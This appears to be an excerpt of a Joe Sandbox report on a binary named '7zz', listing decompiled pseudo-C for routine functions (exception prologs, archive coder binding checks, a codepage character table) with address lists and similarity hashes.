					E0042D12E( *((intOrPtr*)(_t184 + 0x18)), _t187 - 0x3c, _t128 & 0x0000000f);
					_t132 =  *(_t187 - 0x14);
					if(_t132 > 8) {
						E0042D0F8(_t167);
						_t132 =  *(_t187 - 0x14);
					}
					_t168 = 0;
					 *(_t187 - 0x2c) = 0;
					 *(_t187 - 0x28) = 0;
					if(_t132 > 0) {
						 *((intOrPtr*)(_t187 - 0x18)) = 0;
						 *(_t187 - 0x14) = _t187 + _t132 - 0x3d;
						 *(_t187 - 0x20) = _t132;
						do {
							_t168 =  *((intOrPtr*)(_t187 - 0x18));
							asm("cdq");
							 *(_t187 - 0x2c) =  *(_t187 - 0x2c) | E0046C5A0( *( *(_t187 - 0x14)) & 0x000000ff,  *((intOrPtr*)(_t187 - 0x18)), _t173);
							 *(_t187 - 0x28) =  *(_t187 - 0x28) | _t173;
							 *(_t187 - 0x14) =  *(_t187 - 0x14) - 1;
							 *((intOrPtr*)(_t187 - 0x18)) =  *((intOrPtr*)(_t187 - 0x18)) + 8;
							_t49 = _t187 - 0x20;
							 *_t49 =  *(_t187 - 0x20) - 1;
						} while ( *_t49 != 0);
					}
					 *_t182 =  *(_t187 - 0x2c);
					_t182[1] =  *(_t187 - 0x28);
					if(( *(_t187 + 0xb) & 0x00000010) == 0) {
						_t135 = 1;
						_t182[5] = _t135;
					} else {
						_t182[5] = E0042D241(_t173);
						_t168 =  *((intOrPtr*)(_t184 + 0x18));
						_t135 = E0042D241(_t173);
					}
					_t182[6] = _t135;
					if(( *(_t187 + 0xb) & 0x00000020) != 0) {
						_t139 = E0042D241(_t173);
						_t66 =  &(_t182[2]); // 0x107
						 *(_t187 - 0x20) = _t139;
						E0040FA26(_t66, _t139);
						_t168 =  *((intOrPtr*)(_t184 + 0x18));
						E0042D12E( *((intOrPtr*)(_t184 + 0x18)), _t182[4],  *(_t187 - 0x20));
					}
					if(( *(_t187 + 0xb) & 0x00000080) != 0) {
						E0042D0F8(_t168);
					}
					 *(_t187 - 0x10) =  *(_t187 - 0x10) + _t182[5];
					 *(_t187 - 0x1c) =  *(_t187 - 0x1c) + _t182[6];
					_t80 = _t187 - 0x24;
					 *_t80 =  *((intOrPtr*)(_t187 - 0x24)) - 1;
				} while ( *_t80 != 0);
				goto L15;
			}






















                                                                                                                                    0x0042d5f3
                                                                                                                                    0x0042d5f8
                                                                                                                                    0x0042d602
                                                                                                                                    0x0042d608
                                                                                                                                    0x0042d60d
                                                                                                                                    0x0042d610
                                                                                                                                    0x0042d614
                                                                                                                                    0x0042d61c
                                                                                                                                    0x0042d621
                                                                                                                                    0x0042d625
                                                                                                                                    0x0042d62b
                                                                                                                                    0x0042d74c
                                                                                                                                    0x0042d74f
                                                                                                                                    0x0042d755
                                                                                                                                    0x0042d758
                                                                                                                                    0x0042d760
                                                                                                                                    0x0042d762
                                                                                                                                    0x0042d767
                                                                                                                                    0x0042d76c
                                                                                                                                    0x0042d794
                                                                                                                                    0x0042d794
                                                                                                                                    0x0042d79a
                                                                                                                                    0x0042d79c
                                                                                                                                    0x0042d79c
                                                                                                                                    0x0042d7a1
                                                                                                                                    0x0042d7a4
                                                                                                                                    0x0042d7a7
                                                                                                                                    0x0042d7ab
                                                                                                                                    0x0042d7b3
                                                                                                                                    0x0042d7fb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d7fd
                                                                                                                                    0x0042d7fd
                                                                                                                                    0x0042d809
                                                                                                                                    0x0042d80e
                                                                                                                                    0x0042d80e
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d7b5
                                                                                                                                    0x0042d7b5
                                                                                                                                    0x0042d7ba
                                                                                                                                    0x0042d7ec
                                                                                                                                    0x0042d7f0
                                                                                                                                    0x0042d7f2
                                                                                                                                    0x0042d7f2
                                                                                                                                    0x0042d811
                                                                                                                                    0x0042d817
                                                                                                                                    0x0042d81f
                                                                                                                                    0x0042d81f
                                                                                                                                    0x0042d7bc
                                                                                                                                    0x0042d7bf
                                                                                                                                    0x0042d7c3
                                                                                                                                    0x0042d7d4
                                                                                                                                    0x0042d7d4
                                                                                                                                    0x0042d7d7
                                                                                                                                    0x0042d7d9
                                                                                                                                    0x0042d7e3
                                                                                                                                    0x0042d7e7
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d7e7
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d7d9
                                                                                                                                    0x0042d7c5
                                                                                                                                    0x0042d7c8
                                                                                                                                    0x0042d7cc
                                                                                                                                    0x0042d7cd
                                                                                                                                    0x0042d7d2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d7d2
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d7db
                                                                                                                                    0x0042d7db
                                                                                                                                    0x0042d7dc
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d7e1
                                                                                                                                    0x0042d7b3
                                                                                                                                    0x0042d76e
                                                                                                                                    0x0042d771
                                                                                                                                    0x0042d77c
                                                                                                                                    0x0042d77f
                                                                                                                                    0x0042d785
                                                                                                                                    0x0042d78a
                                                                                                                                    0x0042d78f
                                                                                                                                    0x0042d78f
                                                                                                                                    0x0042d78f
                                                                                                                                    0x00000000
                                                                                                                                    0x0042d771
                                                                                                                                    0x0042d631
                                                                                                                                    0x0042d634
                                                                                                                                    0x0042d634
                                                                                                                                    0x0042d638
                                                                                                                                    0x0042d641
                                                                                                                                    0x0042d644
                                                                                                                                    0x0042d64b
                                                                                                                                    0x0042d64e
                                                                                                                                    0x0042d656
                                                                                                                                    0x0042d65a
                                                                                                                                    0x0042d65d
                                                                                                                                    0x0042d669
                                                                                                                                    0x0042d670
                                                                                                                                    0x0042d675
                                                                                                                                    0x0042d678
                                                                                                                                    0x0042d67e
                                                                                                                                    0x0042d686
                                                                                                                                    0x0042d68b
                                                                                                                                    0x0042d691
                                                                                                                                    0x0042d693
                                                                                                                                    0x0042d698
                                                                                                                                    0x0042d698
                                                                                                                                    0x0042d69b
                                                                                                                                    0x0042d69f
                                                                                                                                    0x0042d6a2
                                                                                                                                    0x0042d6a5
                                                                                                                                    0x0042d6a7
                                                                                                                                    0x0042d6ae
                                                                                                                                    0x0042d6b1
                                                                                                                                    0x0042d6b4
                                                                                                                                    0x0042d6b7
                                                                                                                                    0x0042d6bd
                                                                                                                                    0x0042d6c3
                                                                                                                                    0x0042d6c6
                                                                                                                                    0x0042d6c9
                                                                                                                                    0x0042d6cc
                                                                                                                                    0x0042d6d0
                                                                                                                                    0x0042d6d0
                                                                                                                                    0x0042d6d0
                                                                                                                                    0x0042d6b4
                                                                                                                                    0x0042d6dc
                                                                                                                                    0x0042d6e1
                                                                                                                                    0x0042d6e4
                                                                                                                                    0x0042d6fd
                                                                                                                                    0x0042d6fe
                                                                                                                                    0x0042d6e6
                                                                                                                                    0x0042d6ee
                                                                                                                                    0x0042d6f1
                                                                                                                                    0x0042d6f4
                                                                                                                                    0x0042d6f4
                                                                                                                                    0x0042d705
                                                                                                                                    0x0042d708
                                                                                                                                    0x0042d70d
                                                                                                                                    0x0042d713
                                                                                                                                    0x0042d716
                                                                                                                                    0x0042d719
                                                                                                                                    0x0042d721
                                                                                                                                    0x0042d727
                                                                                                                                    0x0042d727
                                                                                                                                    0x0042d730
                                                                                                                                    0x0042d732
                                                                                                                                    0x0042d732
                                                                                                                                    0x0042d73a
                                                                                                                                    0x0042d740
                                                                                                                                    0x0042d743
                                                                                                                                    0x0042d743
                                                                                                                                    0x0042d743
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0042D5F8
                                                                                                                                      • Part of subcall function 00428C94: __EH_prolog.LIBCMT ref: 00428C99
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: $c[@
                                                                                                                                    • API String ID: 3519838083-1303465990
                                                                                                                                    • Opcode ID: a03fa87157ec859ad137ae3f03af2d14d6f5264f4817a720d9191c650317cd75
                                                                                                                                    • Instruction ID: f7f276ab7b0e8e4aae64a949967b144445a492cbfe2f6d3bc49d51a0f31881ab
                                                                                                                                    • Opcode Fuzzy Hash: a03fa87157ec859ad137ae3f03af2d14d6f5264f4817a720d9191c650317cd75
                                                                                                                                    • Instruction Fuzzy Hash: F9717070E002159BCF14EFA9D4816EEB7B1BF84314F50451FE856B7292CB3CA945CBA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0042CD7D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0042CD7D(void* __ecx) {
				signed int _t118;
				signed int _t129;
				signed int* _t130;
				signed int _t150;
				signed int _t151;
				signed int _t160;
				intOrPtr _t162;
				signed int* _t180;
				signed int _t181;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t195;
				signed int _t196;
				intOrPtr _t198;
				void* _t200;
				signed int* _t202;
				void* _t203;

				L0046B890(0x4774bc, _t203);
				_t200 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) > 0x20 ||  *((intOrPtr*)(__ecx + 0x1c)) > 0x20) {
					L31:
					_t118 = 0;
				} else {
					E00404AD0(_t203 - 0x28, 1);
					 *((intOrPtr*)(_t203 - 0x28)) = 0x47ab08;
					_t150 = 0;
					 *(_t203 - 4) = 0;
					E0042CFAA(_t203 - 0x28,  *((intOrPtr*)(__ecx + 0x30)) +  *((intOrPtr*)(__ecx + 0x1c)));
					_t190 = 0;
					if( *((intOrPtr*)(_t200 + 0x1c)) <= 0) {
						L5:
						_t191 = 0;
						if( *((intOrPtr*)(_t200 + 0x30)) <= _t150) {
							L8:
							E0042CFAA(_t203 - 0x28,  *((intOrPtr*)(_t200 + 0x44)));
							_t192 = 0;
							if( *((intOrPtr*)(_t200 + 0x1c)) <= _t150) {
								L11:
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E00408604(_t203 - 0x28);
								_t160 = 0x20;
								memset(_t203 - 0xd0, 0, _t160 << 2);
								_t162 = 4;
								 *(_t203 - 0x38) = _t150;
								 *(_t203 - 0x34) = _t150;
								 *(_t203 - 0x30) = _t150;
								 *((intOrPtr*)(_t203 - 0x2c)) = 0;
								 *((intOrPtr*)(_t203 - 0x3c)) = 0x47a668;
								 *(_t203 - 4) = 1;
								 *(_t203 - 0x4c) = _t150;
								 *(_t203 - 0x48) = _t150;
								 *(_t203 - 0x44) = _t150;
								 *((intOrPtr*)(_t203 - 0x40)) = _t162;
								 *((intOrPtr*)(_t203 - 0x50)) = 0x47a668;
								 *(_t203 - 4) = 2;
								 *(_t203 - 0x10) = _t150;
								if( *((intOrPtr*)(_t200 + 8)) > _t150) {
									do {
										 *(_t203 - 0x14) = _t150;
										_t198 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc)) +  *(_t203 - 0x10) * 4));
										if( *((intOrPtr*)(_t198 + 0x14)) > _t150) {
											do {
												E00415C6D(_t203 - 0x3c,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x14)));
										}
										 *(_t203 - 0x14) = _t150;
										if( *((intOrPtr*)(_t198 + 0x18)) > _t150) {
											do {
												E00415C6D(_t203 - 0x50,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x18)));
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
									} while ( *(_t203 - 0x10) <  *((intOrPtr*)(_t200 + 8)));
								}
								_t195 = 0;
								if( *((intOrPtr*)(_t200 + 0x1c)) > _t150) {
									do {
										_t151 = 1;
										 *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) =  *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) | _t151 <<  *( *(_t203 - 0x44) + ( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8)[1] * 4);
										_t195 = _t195 + 1;
									} while (_t195 <  *((intOrPtr*)(_t200 + 0x1c)));
									_t150 = 0;
								}
								 *(_t203 - 4) = 1;
								E00408604(_t203 - 0x50);
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E00408604(_t203 - 0x3c);
								_t180 = _t203 - 0xd0;
								 *(_t203 - 0x14) = 0x20;
								do {
									 *(_t203 - 0x10) = _t150;
									_t202 = _t203 - 0xd0;
									do {
										_t129 =  *_t180;
										_t196 = 1;
										if((_t129 & _t196 <<  *(_t203 - 0x10)) != 0) {
											 *_t180 = _t129 |  *_t202;
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
										_t202 =  &(_t202[1]);
									} while ( *(_t203 - 0x10) < 0x20);
									_t180 =  &(_t180[1]);
									_t106 = _t203 - 0x14;
									 *_t106 =  *(_t203 - 0x14) - 1;
								} while ( *_t106 != 0);
								_t130 = _t203 - 0xd0;
								while(1) {
									_t181 = 1;
									if(( *_t130 & _t181 << _t150) != 0) {
										goto L31;
									}
									_t150 = _t150 + 1;
									_t130 =  &(_t130[1]);
									if(_t150 < 0x20) {
										continue;
									} else {
										_t118 = 1;
									}
									goto L32;
								}
								goto L31;
							} else {
								while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + 4 + _t192 * 8))) == 0) {
									_t192 = _t192 + 1;
									if(_t192 <  *((intOrPtr*)(_t200 + 0x1c))) {
										continue;
									} else {
										goto L11;
									}
									goto L32;
								}
								goto L30;
							}
						} else {
							while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x34)) + _t191 * 4))) == 0) {
								_t191 = _t191 + 1;
								if(_t191 <  *((intOrPtr*)(_t200 + 0x30))) {
									continue;
								} else {
									goto L8;
								}
								goto L32;
							}
							goto L30;
						}
					} else {
						while(E0042CFD0(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + _t190 * 8))) == 0) {
							_t190 = _t190 + 1;
							if(_t190 <  *((intOrPtr*)(_t200 + 0x1c))) {
								continue;
							} else {
								goto L5;
							}
							goto L32;
						}
						L30:
						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
						E00408604(_t203 - 0x28);
						goto L31;
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
				return _t118;
			}





















                                                                                                                                    0x0042cd82
                                                                                                                                    0x0042cd8f
                                                                                                                                    0x0042cd98
                                                                                                                                    0x0042cf99
                                                                                                                                    0x0042cf99
                                                                                                                                    0x0042cda8
                                                                                                                                    0x0042cdad
                                                                                                                                    0x0042cdb2
                                                                                                                                    0x0042cdbf
                                                                                                                                    0x0042cdc7
                                                                                                                                    0x0042cdca
                                                                                                                                    0x0042cdcf
                                                                                                                                    0x0042cdd4
                                                                                                                                    0x0042cdf2
                                                                                                                                    0x0042cdf2
                                                                                                                                    0x0042cdf7
                                                                                                                                    0x0042ce15
                                                                                                                                    0x0042ce1b
                                                                                                                                    0x0042ce20
                                                                                                                                    0x0042ce25
                                                                                                                                    0x0042ce44
                                                                                                                                    0x0042ce44
                                                                                                                                    0x0042ce4b
                                                                                                                                    0x0042ce54
                                                                                                                                    0x0042ce5b
                                                                                                                                    0x0042ce64
                                                                                                                                    0x0042ce65
                                                                                                                                    0x0042ce68
                                                                                                                                    0x0042ce6b
                                                                                                                                    0x0042ce6e
                                                                                                                                    0x0042ce71
                                                                                                                                    0x0042ce74
                                                                                                                                    0x0042ce7b
                                                                                                                                    0x0042ce7e
                                                                                                                                    0x0042ce81
                                                                                                                                    0x0042ce84
                                                                                                                                    0x0042ce87
                                                                                                                                    0x0042ce8d
                                                                                                                                    0x0042ce91
                                                                                                                                    0x0042ce94
                                                                                                                                    0x0042ce96
                                                                                                                                    0x0042ce9c
                                                                                                                                    0x0042ce9f
                                                                                                                                    0x0042cea5
                                                                                                                                    0x0042cea7
                                                                                                                                    0x0042cead
                                                                                                                                    0x0042ceb2
                                                                                                                                    0x0042ceb8
                                                                                                                                    0x0042cea7
                                                                                                                                    0x0042cec0
                                                                                                                                    0x0042cec3
                                                                                                                                    0x0042cec5
                                                                                                                                    0x0042cecb
                                                                                                                                    0x0042ced0
                                                                                                                                    0x0042ced6
                                                                                                                                    0x0042cec5
                                                                                                                                    0x0042cedb
                                                                                                                                    0x0042cee1
                                                                                                                                    0x0042ce96
                                                                                                                                    0x0042cee6
                                                                                                                                    0x0042ceeb
                                                                                                                                    0x0042ceed
                                                                                                                                    0x0042cefb
                                                                                                                                    0x0042cf11
                                                                                                                                    0x0042cf13
                                                                                                                                    0x0042cf14
                                                                                                                                    0x0042cf19
                                                                                                                                    0x0042cf19
                                                                                                                                    0x0042cf1e
                                                                                                                                    0x0042cf22
                                                                                                                                    0x0042cf27
                                                                                                                                    0x0042cf2e
                                                                                                                                    0x0042cf33
                                                                                                                                    0x0042cf39
                                                                                                                                    0x0042cf40
                                                                                                                                    0x0042cf40
                                                                                                                                    0x0042cf43
                                                                                                                                    0x0042cf49
                                                                                                                                    0x0042cf4c
                                                                                                                                    0x0042cf50
                                                                                                                                    0x0042cf55
                                                                                                                                    0x0042cf59
                                                                                                                                    0x0042cf59
                                                                                                                                    0x0042cf5b
                                                                                                                                    0x0042cf5e
                                                                                                                                    0x0042cf61
                                                                                                                                    0x0042cf67
                                                                                                                                    0x0042cf6a
                                                                                                                                    0x0042cf6a
                                                                                                                                    0x0042cf6a
                                                                                                                                    0x0042cf6f
                                                                                                                                    0x0042cf75
                                                                                                                                    0x0042cf79
                                                                                                                                    0x0042cf7e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042cf80
                                                                                                                                    0x0042cf81
                                                                                                                                    0x0042cf87
                                                                                                                                    0x00000000
                                                                                                                                    0x0042cf89
                                                                                                                                    0x0042cf89
                                                                                                                                    0x0042cf89
                                                                                                                                    0x00000000
                                                                                                                                    0x0042cf87
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ce27
                                                                                                                                    0x0042ce27
                                                                                                                                    0x0042ce3e
                                                                                                                                    0x0042ce42
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ce42
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ce27
                                                                                                                                    0x0042cdf9
                                                                                                                                    0x0042cdf9
                                                                                                                                    0x0042ce0f
                                                                                                                                    0x0042ce13
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042ce13
                                                                                                                                    0x00000000
                                                                                                                                    0x0042cdf9
                                                                                                                                    0x0042cdd6
                                                                                                                                    0x0042cdd6
                                                                                                                                    0x0042cdec
                                                                                                                                    0x0042cdf0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042cdf0
                                                                                                                                    0x0042cf8d
                                                                                                                                    0x0042cf8d
                                                                                                                                    0x0042cf94
                                                                                                                                    0x00000000
                                                                                                                                    0x0042cf94
                                                                                                                                    0x0042cdd4
                                                                                                                                    0x0042cf9b
                                                                                                                                    0x0042cfa1
                                                                                                                                    0x0042cfa9

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: $
                                                                                                                                    • API String ID: 3519838083-227171996
                                                                                                                                    • Opcode ID: a76aadd02c451df5a530bc4837ced833aeb8ce480aed34779acfe00049131935
                                                                                                                                    • Instruction ID: 5d0b406c18202b3f46059241855fa713d8f087d48a2dc57dffdc94942331e0a4
                                                                                                                                    • Opcode Fuzzy Hash: a76aadd02c451df5a530bc4837ced833aeb8ce480aed34779acfe00049131935
                                                                                                                                    • Instruction Fuzzy Hash: A871AB71A0021ACFCB20CF99E5C0AEEB7B2FF48318F51456ED416A7291D734AA46CF58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00471A83 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E00471A83(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x496228,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00472375(1,  &_v280, 0x100,  &_v1304,  *0x496228,  *0x496444, 0);
						E00472126( *0x496444, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x496228, 0);
						E00472126( *0x496444, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x496228, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x496240) =  *(_t55 + 0x496240) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x496341) =  *(_t55 + 0x496341) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x496240) = _t77;
								goto L16;
							}
							 *(_t55 + 0x496341) =  *(_t55 + 0x496341) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x496240) =  *(_t43 + 0x496240) & 0x00000000;
						} else {
							 *(_t43 + 0x496341) =  *(_t43 + 0x496341) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x496341) =  *(_t43 + 0x496341) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x496240) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}


























                                                                                                                                    0x00471aa0
                                                                                                                                    0x00471aa6
                                                                                                                                    0x00471aad
                                                                                                                                    0x00471aad
                                                                                                                                    0x00471ab4
                                                                                                                                    0x00471ab5
                                                                                                                                    0x00471ab9
                                                                                                                                    0x00471abc
                                                                                                                                    0x00471ac5
                                                                                                                                    0x00471afe
                                                                                                                                    0x00471b1d
                                                                                                                                    0x00471b41
                                                                                                                                    0x00471b69
                                                                                                                                    0x00471b71
                                                                                                                                    0x00471b73
                                                                                                                                    0x00471b79
                                                                                                                                    0x00471b79
                                                                                                                                    0x00471b7f
                                                                                                                                    0x00471b9a
                                                                                                                                    0x00471bac
                                                                                                                                    0x00000000
                                                                                                                                    0x00471bac
                                                                                                                                    0x00471b9c
                                                                                                                                    0x00471ba3
                                                                                                                                    0x00471b8f
                                                                                                                                    0x00471b8f
                                                                                                                                    0x00000000
                                                                                                                                    0x00471b8f
                                                                                                                                    0x00471b81
                                                                                                                                    0x00471b88
                                                                                                                                    0x00000000
                                                                                                                                    0x00471bb3
                                                                                                                                    0x00471bb3
                                                                                                                                    0x00471bb5
                                                                                                                                    0x00471bb6
                                                                                                                                    0x00000000
                                                                                                                                    0x00471b79
                                                                                                                                    0x00471ac9
                                                                                                                                    0x00471acc
                                                                                                                                    0x00471acc
                                                                                                                                    0x00471acf
                                                                                                                                    0x00471ad4
                                                                                                                                    0x00471ad8
                                                                                                                                    0x00471adf
                                                                                                                                    0x00471ae7
                                                                                                                                    0x00471af1
                                                                                                                                    0x00471af1
                                                                                                                                    0x00471af1
                                                                                                                                    0x00471af4
                                                                                                                                    0x00471af5
                                                                                                                                    0x00471af8
                                                                                                                                    0x00000000
                                                                                                                                    0x00471afd
                                                                                                                                    0x00471bbc
                                                                                                                                    0x00471bc3
                                                                                                                                    0x00471bc6
                                                                                                                                    0x00471be4
                                                                                                                                    0x00471bf9
                                                                                                                                    0x00471beb
                                                                                                                                    0x00471beb
                                                                                                                                    0x00471bf4
                                                                                                                                    0x00000000
                                                                                                                                    0x00471bf4
                                                                                                                                    0x00471bcd
                                                                                                                                    0x00471bcd
                                                                                                                                    0x00471bd6
                                                                                                                                    0x00471bd9
                                                                                                                                    0x00471bd9
                                                                                                                                    0x00471bd9
                                                                                                                                    0x00471c00
                                                                                                                                    0x00471c01
                                                                                                                                    0x00471c07

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
